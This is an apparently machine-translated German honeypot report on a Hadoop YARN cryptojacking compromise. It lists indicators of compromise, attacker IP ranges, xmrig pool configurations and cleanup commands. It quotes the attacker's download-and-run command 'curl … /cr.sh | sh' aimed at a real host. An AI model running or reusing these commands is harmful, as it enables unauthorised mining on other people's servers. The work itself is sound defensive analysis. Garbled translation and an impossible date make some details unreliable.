HINWEIS FÜR DIE LESER: DIESER ARTIKEL IST FÜR CYBERSICHERHEITSFACHLEUTE GEDACHT.
VERÖFFENTLICHTE LINKS NICHT WIEDERHERSTELLEN!
Die Komplexität mancher Themen wird einem erst bewusst, wenn man auf sie stößt, und dann ist es meist zu spät.
Um den Leuten verständlich zu machen, was „Cyber“ bedeutet, habe ich mich an den letzten Abenden an den Computer gesetzt und zu Bildungszwecken eine HDFS-Umgebung erstellt1 ungeschützt, um zu verstehen, was im Falle einer Installation und Konfiguration einer Umgebung passieren könnte, die nicht ausreichend „gehärtet“ oder kontrolliert ist, d. h. der häufigste Fall von Installationen, die von ungelerntem oder nicht besonders aufmerksamem technischem Personal durchgeführt werden.
Es wird berichtet, dass ein Sicherheitsproblem im Hadoop Yarn-Ressourcenverwaltungssystem vorliegt (unautorisierter Zugriff auf die REST-API).2), mit dem Sie beliebigen Code aus der Ferne ausführen können. Nachdem die Infrastruktur geschaffen war, habe ich einfach darauf gewartet, dass sich die Ereignisse entwickeln. Nach einer Woche stellte ich fest, dass die geschaffene Infrastruktur angegriffen und kompromittiert worden war.
Anschließend habe ich einen der Kompromittierungsfälle untersucht und Sicherheitsempfehlungen und -lösungen zur Behebung dieses Problems bereitgestellt.
Der gewählte Fall ist ein Fall von Bergbau di Kryptowährung
Versuchen wir zunächst, etwas mehr über die verwendete Infrastruktur zu verstehen:Honeypot3".
Hadoop ist eine von der Apache Foundation entwickelte verteilte Systeminfrastruktur, eine einheitliche Ressourcenverwaltungsplattform für Hadoop-Systeme, deren Hauptaufgabe darin besteht, eine einheitliche Verwaltung und Planung von Cluster-Ressourcen zu erreichen (im Allgemeinen zur Verwaltung von Daten verwendet). Dateisystem verteilt). Der Rahmen Berechnung MapReduce kann als Anwendungsprogramm ausgeführt werden. Oben ist das YARN-System dargestellt. Ressourcen werden über YARN verwaltet. Einfach ausgedrückt kann ein Benutzer bestimmte Anwendungsprogramme zur Ausführung an YARN übermitteln, was die Ausführung zugehöriger Systembefehle umfassen kann.
YARN stellt REST-APIs bereit, die standardmäßig auf den Ports 8088 und 8090 geöffnet sind. Aus diesem Grund kann jeder Benutzer über die APIs das Senden von Aktivitäten und andere Vorgänge im Direktmodus durchführen. Bei falscher Konfiguration werden REST-APIs im öffentlichen Netzwerk geöffnet (z. B. im Internet, wenn Sie sich für die Verwendung entscheiden). Gruppe HDFS an Cloud) und ermöglicht unbefugten Zugriff auf das erstellte System. Letztlich bedeutet die Fehlkonfiguration also, dass jeder Angreifer die Infrastruktur zur Ausführung von Remote-Befehlen nutzen kann, um diese auszuführen Bergbau4 oder andere böswillige Aktivitäten auf Ihrem System.
Warum ist diese Art von Geschäft so hinterlistig?
Weil Sicherheitssysteme kaum in HDFS-Cluster eingefügt sind oder Systeme verwendet werden, um die Kerberos-Authentifizierung zu ermöglichen und anonymen Zugriff zu verhindern (Upgrade-Versionen), oder es gibt sie Überwachung Dies liegt daran, dass diese Strukturen geschaffen werden, um die Leistung eines Systems zu maximieren, mit dem sie laufen query ed Analytik schon rechnerisch aufwendig.
Schritte böswilliger Aktivität gefunden
-
Einbruchsanalyse
Auf der als Lockvogel verwendeten Maschine wurde Hadoop YARN im Standardmodus installiert und konfiguriert, was an sich schon ein Sicherheitsproblem durch unbefugten Zugriff auf das System mit sich bringt. L'Eindringling Verwenden Sie direkt die auf Port 8088 geöffnete REST-API, danach a Crawler5 identifiziert speziell a kompensieren Anzahl offener Ports, die vom Ausführenden vorkonfiguriert wurden. An diesem Punkt ist dieEindringling kann Ausführungsbefehle senden, um ein Skript herunterzuladen und auszuführen6 .sh auf dem Server (im Anhang 1 das gesamte Skript gefunden, cr.sh). Mehr herunterladen wird dann den Vorgang starten Bergbau.
Der gesamte Prozess ist relativ einfach und gut strukturiert und beim Lesen des Skripts erkennt man, dass nichts dem Zufall überlassen wird, wie zum Beispiel einige Überprüfungen, die am durchgeführt werden Server Gast Hadoop.
Interessanter Befehl gefunden und ausgeführt:
exec /bin/bash -c "curl 185.222.210.59/cr.sh | sh & disown"
Ich verweile bei diesem Befehl, um zwei sehr wichtige Aspekte hervorzuheben, nämlich die IP-Adresse, von der das Skript heruntergeladen wird, und einige Aktivitäten, die dazu dienen, bösartige Aktivitäten zu verschleiern7.
Wenn wir die Analyse des Codes innerhalb des cr.sh-Skripts fortsetzen, ist es leicht zu erkennen, dass der Autor desselben besonderes Augenmerk auf die Beseitigung der Spuren der durchgeführten Aktivitäten gelegt hat8.
An dieser Stelle können wir zusammenfassend sagen, dass das Ganze Skript Es ist sehr detailliert und es scheint, dass jede Funktion verschachtelt und aufgerufen wird. Viele Dateien sind am gesamten Prozess beteiligt, sodass wir die Hauptschritte wie folgt beschreiben können:
-
Bereinigen Sie verwandte Prozesse, Dateien und Crontab-Aktivitäten.
-
Beurteilen und laden Sie das Programm herunter BergbauÜberprüfen Sie gleichzeitig den MD5-Wert und verwenden Sie zusätzlich zum überprüften Server auch https://transfer.sh, um den bereitzustellen herunterladen der Sicherung;
-
Fügt die Ausführungsaufgabe von hinzu herunterladen die Skript in Crontab.
Die wichtigsten Indikatoren, die sich aus der Analyse ergaben, sind die folgenden:
-
185.222.210.59;
-
cr.sh
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
-
http:// 185.222.210.59/re.php
-
xmrig_64 oder xmrig_32
Wir werden mit einer OSINF-Schleife testen9 die Indikatoren oben.
-
185.222.210.59
Wir versuchen, die Herkunft dieser IP-Adresse zu überprüfen. Die folgende Abbildung zeigt die wichtigsten Felder im Relief:
In manchen Foren10 Von HDFS-basierten Plattformherstellern/Veröffentlichungsfirmen werden die IP-Adresse und die genaue Zeichenfolge, die auch in unserem Skript gefunden wurde, gemeldet und um Erklärungen zu diesem Thema gebeten. In manchen Fällen wird gefragt, ob es sich um eine Standardkonfiguration handelt. Dank einiger HDFS-Administratoren, die manuelle und aperiodische Überprüfungen durchführen, gibt es keine Automatisierung.
Durch die Überprüfung der Funktionsfähigkeit des Servers wird Folgendes erreicht:
Grundinformation
|
OS |
Debian |
|
Protokolle |
80/HTTP und 22/SSH |
-
80/HTTP
|
GET / |
|
|
Server |
Apache httpd 2.4.10 |
|
Statuszeile |
200 OK |
|
Page Titel |
Apache2 Debian Default-Seite: Es funktioniert |
|
GET / |
-
22/SSH
|
SSHv2-Handshake |
|
|
Server |
OpenSSH 6.7p1 |
|
Banner |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Hostschlüssel |
|
|
Algorithmus |
ecdsa-sha2-nistp256 |
|
Fingerabdruck |
5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40 |
|
Ausgehandelter Algorithmus |
|
|
Schlüsselaustausch |
Curve25519-sha256@libssh.org |
|
Symmetrische Chiffre |
aes128-ctr | aes128-ctr |
|
MAC |
hmac-sha2-256 | hmac-sha2-256 |
Wir haben außerdem überprüft, dass Port 111 geöffnet ist, was dem Portmap-Dienst entspricht. Daher von der Seite Server die Portmapper Abhören von Port 111 (Portmapper), von der Seite Auftraggeber Es gibt eine Reihe von Programmen, die für jeden RPC-Dienst geeignet sind11, müssen sie zunächst die konsultieren Portmapper Fernbedienung, die ihnen die Informationen liefert, die sie zum Herstellen einer Verbindung mit dem benötigen Daemon qualifiziert. Es könnte auch eine mögliche Schwachstelle im Dienst überprüft werden, die jedoch nicht Gegenstand von Untersuchungen und Analysen ist.
So ist die Server Der betreffende Server ist über Port 22 mit dem SSH-Protokoll „verbunden“ und wird wahrscheinlich gewartet, was seine verschlüsselte Verbindung gewährleistet. Aus dem Bereich 22.ssh.v2.server_host_key.fingerprint_sha256, also von Fingerabdruck Nach dem SSH des Servers zeigen Suchvorgänge, dass keine anderen vorhanden sind.
Es wird auch berichtet, dass das Datum Mittwoch, 80. Mai 16, 2018:14:58 GMT in 53.http.get.headers.last_modified angegeben ist
Il Server gehört zur Adressverfügbarkeit der Firma PRISM BUSINESS SERVICES LTD, die von der Hauptseite http://www. prismbusiness.co.uk/about-us/ befasst sich offenbar nicht mit Aktivitäten im technischen Bereich der IKT, sondern in anderen Bereichen. Wenn sie aktive Server in einem Kontext haben Cloud, die möglicherweise bei Bedarf für diesen Zweck konfiguriert und/oder auf jeden Fall verwaltet werden, könnten sich ihrer aktuellen Verwendung nicht bewusst sein.
Das gesamte Netz ihrer Verfügbarkeit wird gemeldet:
Für die gescannte IP gibt es keine DNS-Auflösung.
-
cr.sh
Lo Skript cr.sh, das analysiert wurde, hat Folgendes MD5 48e79f8de26fa56d955a28c2de493132Es gibt jedoch keine Hinweise auf eine Indexierung im Internet.
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
Die angezeigten MD5s entsprechen den während der Ausführung des Skripts heruntergeladenen Dateien und sind in der folgenden Tabelle aufgeführt:
|
Dateinamen |
MD5 |
|
xmrig_64 |
c8c1f2da51fbd0aea60e11a81236c9dc |
|
xmrig_32 |
5110222de7330a371c83af67d46c4242 |
Die oben genannten Dateien stellen den Kern der Ausführung dar Der Nachweis der Arbeits (PoW) von einem kryptowährung Bekanntlich handelt es sich tatsächlich um Monero.
-
https:// transfer.sh/ixQBE/zzz
Interessant ist die Verwendung von transfer.sh, was sich als a herausstellt Taktiken, Techniken und Verfahren (TTPs) des Verhaltens davon Eindringling, der somit ein Backup für die Downloads der ausführbaren Dateien von erhält Data Mining.
Tatsächlich hat sich gezeigt, dass transfer.sh nichts weiter ist als eine schnelle und einfache Dateifreigabe über die Befehlszeile. Dieser Code enthält den Server mit allem, was Sie zum Erstellen Ihrer eigenen Instanz benötigen“, alles zum Download verfügbar unter https://github.com/dutchcoders/transfer.sh und auf einer Website https://transfer.sh/, wo es Erklärungen zur Verwendung mit Anwendungsfällen gibt, um es einfach integrieren und konfigurieren zu können. Der Prozess von Wiederverwendung von Code wird heute häufig sowohl im Kontext von verwendet Cyberkriminalität das von Kontexten, die viel breiter sind als Cyberspionage o Cyber-Intelligenz.
-
http:// 185.222.210.59/g.php
Die Seite antwortet heute, 02. Juni 2018, mit einer IP-Adresse 95.142.40.81, während zum Zeitpunkt der Entdeckung des Skript Die angezeigte IP-Adresse war die 46.30.42.162. Beide haben das gleiche Verhalten, eingefügt als Variable f1, nach den mit getconf LONG_BIT durchgeführten Prüfungen erfolgt der Download der ausführbaren Dateien xmrig_64 oder xmrig_32. Offensichtlich ermöglicht ihm dies, wenn sich herausstellt, dass eine erste IP-Adresse bösartig ist, nicht jedoch die Kontroll- und Verwaltungs-IP 185.222.210.59, einige Sicherheitsüberprüfungen unbrauchbar zu machen, z schwarze Liste da Firewall, nicht-granulare Kategorisierungen von Websense o Warnung von SIEM, das einem SOC zur Verfügung steht.
Mal sehen, ob wir aus den beiden IP-Adressen etwas herausbekommen:
46.30.42.162
Die Adresse führt zur Verfügbarkeit von Eurobyte VPS und die Adressierung führt zu einer Klasse von 24 Baradressen zur Verfügbarkeit dieses Hostings, das russischen Ursprungs ist.
Das auch Server, scheint die Ports 22 und 80 geöffnet zu haben, mit Debian OS.
Hier sind die gefundenen Details:
Grundinformation
|
OS |
Debian |
|
Netzwerk |
MCHOST – AS (RU) |
|
Routing |
46.30.42.0/24 über AS7018, AS3356, AS35415, AS48282 |
|
Protokolle |
80/HTTP und 22/SSH |
-
80/HTTP
|
GET / |
|
|
Server |
Apache httpd 2.4.10 |
|
Statuszeile |
200 OK |
|
Page Titel |
Apache2 Debian Default-Seite: Es funktioniert |
|
GET / |
-
22/SSH
|
SSHv2-Handshake |
|
|
Server |
OpenSSH 6.7p1 |
|
Banner |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Hostschlüssel |
|
|
Algorithmus |
ecdsa-sha2-nistp256 |
|
Fingerabdruck |
3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad |
|
Ausgehandelter Algorithmus |
|
|
Schlüsselaustausch |
Curve25519-sha256@libssh.org |
|
Symmetrische Chiffre |
aes128-ctr | aes128-ctr |
|
MAC |
hmac-sha2-256 | hmac-sha2-256 |
Es ist zu beachten, dass eine Suche anhand des Host-Key-Fingerabdrucks ergibt, dass es 41 weitere Server mit derselben Signatur gibt. Von diesen 41 Servern steht dem Eindringling auch die neue IP-Adresse 95.142.40.81 zur Verfügung.
Anhand dieser Daten kann mit hoher Wahrscheinlichkeit davon ausgegangen werden, dass Sie einen gefunden haben Pool erstklassige Infrastruktur dieser Single Eindringling oder Cyber-Crime-Gruppe.
Die Adressen und alle für spätere Aktivitäten nützlichen Informationen werden gemeldet:
|
95.142.40.74 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.249 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.89 (vz229526.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.190 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.189 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.47.115 (vz227413.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.39.241 (shimshim.info) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
95.142.40.188 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.41.207 (vz230806.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.41.182 (vz230501.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.39.251 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.67 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.65 (profshinservice.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.45.91 (vz220153.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.46 (server.badstudio.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.41.80 (track.dev) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.45.152 (vz230274.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.72 (vz231895.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.137 (vz224405.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.39.151 (donotopen.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
185.154.52.117 (vz230686.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.47.157 (vz228859.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.83 (vz228857.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.86 (kolos1952.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
95.142.40.81 (vz228855.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.42.162 (server.com) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.82 (vz228856.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.43.128 (vz228757.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.52.236 (supportt.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
95.142.39.109 (vz228627.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.40.44 (vz229990.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.39.164 (vz232259.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
46.30.45.30 (shop.engine) |
AS (48282) Russland Standort.Land: Russland |
|
95.142.39.172 (gehostet von.wikhost.com) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
185.154.52.161 (piar60.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
95.142.40.87 (register.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
95.142.40.88 (buled.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
185.154.53.190 (vz228963.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland MySQL-Datenbank |
|
46.30.41.51 (vz225213.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.53.108 (vz224405.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
|
185.154.52.181 (vz224405.eurodir.ru) |
AS (48282) Russland Standort.Land: Russland |
Dies sind stattdessen die Metadaten zur Analyse der 41 oben aufgeführten IPs:
Alle gefundenen Adressen beziehen sich auf AS MCHOST-AS, RU:
1. Straße Frezernaiy, 2/1 Straße 10
109202 Moskau
Russische Föderation
Telefon: + 7 495 6738456
Fax: + 7 495 6738456
E-Mail: info (at) mhost (dot) ru
Bediente Gebiete: RU
-
http:// 185.222.210.59/w.conf
Oggi:
{
„algo“: „cryptonight“,
„Hintergrund“: wahr,
„Farben“: falsch,
„Wiederholungen“: 5,
„retry-pause“: 5,
„Spendenlevel“: 1,
„syslog“: falsch,
„Protokolldatei“: null,
„Druckzeit“: 60,
„av“: 0,
„sicher“: falsch,
„maximale CPU-Auslastung“: 95,
„CPU-Priorität“: 4,
„Threads“: null,
„Pools“: [
{
„url“: „stratum+tcp://46.30.43.159:80“,
„Benutzer“: „h“,
„pass“: „h“,
„keepalive“: wahr,
„nicehash“: falsch,
"Varianten": -1
}
],
„Bienen“: {
„Port“: 0,
„Zugriffstoken“: null,
„Arbeiter-ID“: null
}
}
Zum Zeitpunkt des Auffindens der Skript:
{
„algo“: „cryptonight“,
„Hintergrund“: wahr,
„Farben“: falsch,
„Wiederholungen“: 5,
„retry-pause“: 5,
„Spendenlevel“: 1,
„syslog“: falsch,
„Protokolldatei“: null,
„Druckzeit“: 60,
„av“: 0,
„sicher“: falsch,
„maximale CPU-Auslastung“: 95,
„CPU-Priorität“: 4,
„Threads“: null,
„Pools“: [
{
„url“: „stratum+tcp://179.60.146.10:5556“,
„Benutzer“: „h“,
„pass“: „h“,
„keepalive“: wahr,
„nicehash“: falsch,
"Varianten": -1
},
{
„url“: „stratum+tcp://46.30.43.159:80“,
„Benutzer“: „h“,
„pass“: „h“,
„keepalive“: wahr,
„nicehash“: falsch,
"Varianten": -1
}
],
„Bienen“: {
„Port“: 0,
„Zugriffstoken“: null,
„Arbeiter-ID“: null
}
}
Es ist wichtig zu betonen, dass die conf-Datei zwei wichtige Indikatoren für die Analysephase definiert (wir können auch drei definieren):
-
stratum+tcp://46.30.43.159:80 (zu verschiedenen Terminen geteilt);
-
stratum+tcp://179.60.146.10: 5556 (nur im ersten Fund);
-
„algo“: „cryptonight“;
Lassen Sie uns zunächst die gemeinsame IP analysieren 46.30.43.159. Diese IP-Adresse hat in der Verfügbarkeit von Eurobyte VPS, Russisch, die PTR als vz230703.eurodir.ru und ist Teil eines Netzes 46.30.43.0/24. Die PTRs der IPs der Netto-, Anhang 1 zeigt die gesamte Klasse, sie haben etwas Besonderes. Ich berichte in der Tabelle unten über die PTRs mit Ähnlichkeit ohne das A-Feld, es sind 41:
|
IP |
PTR |
|
46.30.43.13 |
vz94180.eurodir.ru |
|
46.30.43.17 |
vz203045.eurodir.ru |
|
46.30.43.21 |
vz206109.eurodir.ru |
|
46.30.43.23 |
vz216100.eurodir.ru |
|
46.30.43.24 |
vz174272.eurodir.ru |
|
46.30.43.30 |
vz35015.eurodir.ru |
|
46.30.43.57 |
vz78210.eurodir.ru |
|
46.30.43.58 |
vz229754.eurodir.ru |
|
46.30.43.61 |
vz35015.eurodir.ru |
|
46.30.43.64 |
vz38207.eurodir.ru |
|
46.30.43.66 |
vz86195.eurodir.ru |
|
46.30.43.70 |
vz173527.eurodir.ru |
|
46.30.43.77 |
vz174931.eurodir.ru |
|
46.30.43.79 |
vz195563.eurodir.ru |
|
46.30.43.82 |
vz197086.eurodir.ru |
|
46.30.43.90 |
vz120816.eurodir.ru |
|
46.30.43.93 |
vz173527.eurodir.ru |
|
46.30.43.98 |
vz94065.eurodir.ru |
|
46.30.43.101 |
vz216360.eurodir.ru |
|
46.30.43.102 |
vz195005.eurodir.ru |
|
46.30.43.123 |
vz212299.eurodir.ru |
|
46.30.43.128 |
vz228757.eurodir.ru |
|
46.30.43.130 |
vz168899.eurodir.ru |
|
46.30.43.156 |
vz195735.eurodir.ru |
|
46.30.43.159 |
vz230703.eurodir.ru |
|
46.30.43.161 |
vz171964.eurodir.ru |
|
46.30.43.166 |
vz123353.eurodir.ru |
|
46.30.43.170 |
vz224733.eurodir.ru |
|
46.30.43.172 |
vz226924.eurodir.ru |
|
46.30.43.184 |
vz171966.eurodir.ru |
|
46.30.43.186 |
vz162078.eurodir.ru |
|
46.30.43.214 |
vz207073.eurodir.ru |
|
46.30.43.219 |
vz110518.eurodir.ru |
|
46.30.43.224 |
vz98980.eurodir.ru |
|
46.30.43.226 |
vz100250.eurodir.ru |
|
46.30.43.229 |
vz110562.eurodir.ru |
|
46.30.43.232 |
vz228251.eurodir.ru |
|
46.30.43.237 |
vz162078.eurodir.ru |
|
46.30.43.244 |
vz207073.eurodir.ru |
|
46.30.43.245 |
vz174272.eurodir.ru |
|
46.30.43.246 |
vz157495.eurodir.ru |
Auch in diesem Fall ist sich der Manager möglicherweise nicht darüber im Klaren, dass einige dieser Server, die ihm zur Verfügung stehen, für Zwecke Dritter genutzt werden. Er sollte sie jedoch einzeln analysieren, um weitere Ähnlichkeiten festzustellen.
Die Analyse der 179.60.146.10Stattdessen haben wir Folgendes:
ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ
Port 22, 111, 5555 Ergebnis XNUMXh geöffnet und das auch Server verwendet OpenSSHVersion: 6.7p1 Debian 5+deb8u3
Leider gibt es keine weiteren Beweise.
Cryptonight Stattdessen ist es ein starker Indikator dafür, was Sie tun möchten, sobald Sie auf klicken Ziel. Konkret geht es darum, die Blockaden der zu untergraben kryptowährung von Monero, indem Sie die eingeben Ziel innerhalb eines Pools vorhanden des Eindringlings. Die Wahl ist kein Zufall. Das Protokoll Cryptonight wurde entwickelt, um von übernommen zu werden Bergmann Wer nicht über die Verfügbarkeit von ASICs oder Clustern sehr teurer Grafikkarten verfügt, kann aber auf die klassischen CPUs von PCs, Notebooks oder MiniPCs zurückgreifen.
Tatsächlich wird die CryptoNight dafür verwendet Bergbau dieser Münzen mit dem CryptoNote-Protokoll. Es handelt sich um eine streng speichergebundene Funktion (Speicher-Hard-Hash), in diesem Fall zum Cache-Speicher der dritten Ebene der CPUs, da dieser auf Latenz ausgerichtet ist. Diese Einschränkung wurde eingeführt, um CryptoNight auf Systemen wie GPUs und FPGAs ineffizient zu machen, die keinen Cache-Speicher haben und daher bei der Verwendung des Algorithmus benachteiligt sind.
Die Dimensionen des Scratchpad der CryptoNight betragen aus folgenden Gründen ca. 2 MB Speicher für jede Instanz:
-
kann in den L3-Caches (pro Kern) moderner Prozessoren enthalten sein;
-
eine interne Erinnerung an a Megabyte è sind eine inakzeptable Größe für die Pipeline traditioneller ASICs;
-
GPUs können Hunderte davon ausführen Faden aber sie haben eine viel schlechtere Latenz als der L3-Cache moderner CPUs;
-
eine deutliche Erweiterung von Scratchpad es würde eine Zunahme der Interaktionen erfordern. Wenn ein Knoten viel Zeit damit verbracht hätte, einen Block zu hashen, könnte er leicht mit einem Block-Hashing-Mechanismus überflutet werden. Überschwemmung von falschen Blöcken, die einen DDoS verursachen.
Upgrade
Gerade in diesen Tagen hat sich etwas geändert Skript cr.sh, Konfigurationsdateien und ausführbare Dateien.
Der Download der ausführbaren Dateien für die Daten Bergbau wird von der IP-Adresse 95.142.40.83 erhalten, die zur Identifizierung über das führte Fingerabdruck des SSH-Schlüssels stehen dem Benutzer zusätzliche IP-Adressen zur VerfügungEindringling.
Die folgende Tabelle zeigt die Details von 20 von 65 IP-Adressen, da es nicht möglich ist, sie alle in großen Mengen zu erhalten (Zeitmangel usw.). Konto (nicht gegen Gebühr erhältlich) mit den gleichen Schlüsseln ssh und die gleichen Konfigurationen.
|
95.142.39.233 vz231616.eurodir.ru |
McHost.Ru Hinzugefügt am 2018 06:03:03 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.43.128 vz228757.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:03:03 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.47.107 vz227413.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:03:03 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.41.182 vz230501.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:02:21 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.47.21 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Hinzugefügt am 2018 06:02:16 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
95.142.40.188 vz232259.eurodir.ru |
McHost.Ru Hinzugefügt am 2018 06:02:12 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.45.30 Shop-Engine |
EuroByte LLC Hinzugefügt am 2018 06:02:09 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
95.142.40.81 vz228855.eurodir.ru |
McHost.Ru Hinzugefügt am 2018 06:02:07 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
185.154.53.137 vz224405.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:02:07 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.47.82 vz227413.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:02:04 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
185.154.53.67 vz232259.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:02:03 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
95.142.40.87 register.ru |
McHost.Ru Hinzugefügt am 2018 06:01:22 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.47.66 vz227407.eurodir.ru |
EuroByte LLC Hinzugefügt am 2018 06:01:18 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
185.154.52.236 supportt.ru |
EuroByte LLC Hinzugefügt am 2018 06:01:11 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.47.35 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Hinzugefügt am 2018 06:01:11 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
185.154.53.46 server.badstudio.ru |
EuroByte LLC Hinzugefügt am 2018 06:01:07 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
95.142.40.89 vz229526.eurodir.ru |
McHost.Ru Hinzugefügt am 2018 05:31:14 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
46.30.42.162 server.com |
EuroByte LLC Hinzugefügt am 2018 05:31:12 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
95.142.39.102 vz222177.eurodir.ru |
McHost.Ru Hinzugefügt am 2018 05:31:10 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
|
95.142.40.86 kolos1952.ru |
McHost.Ru Hinzugefügt am 2018 05:31:09 GMT Russische Föderation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Schlüsseltyp: ssh-rsa |
Hier sind einige detaillierte Grafiken:
Darüber hinaus gibt es folgende herunterladbare Dateien:
|
Dateinamen |
MD5 |
|
xm64 |
183664ceb9c4d7179d5345249f1ee0c4 |
|
xm32 |
b00f4bbd82d2f5ec7c8152625684f853 |
Zusätzlich zu den oben genannten, in der Skript, die folgenden Befehle sind vorhanden:
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | Crontabs -
crontab -l | sed '/192.99.142.226/d' | Crontabs -
crontab -l | sed '/192.99.142.248/d' | Crontabs -
crontab -l | sed '/logo4/d' | Crontabs -
crontab -l | sed '/logo9/d' | Crontabs -
crontab -l | sed '/logo0/d' | Crontabs –
Die Verwendung des Befehls sed ist sofort ersichtlich, kommt in der Programmierung nicht häufig vor und könnte daher ebenfalls zu den vom feindlichen Akteur verwendeten TTPs gehören.
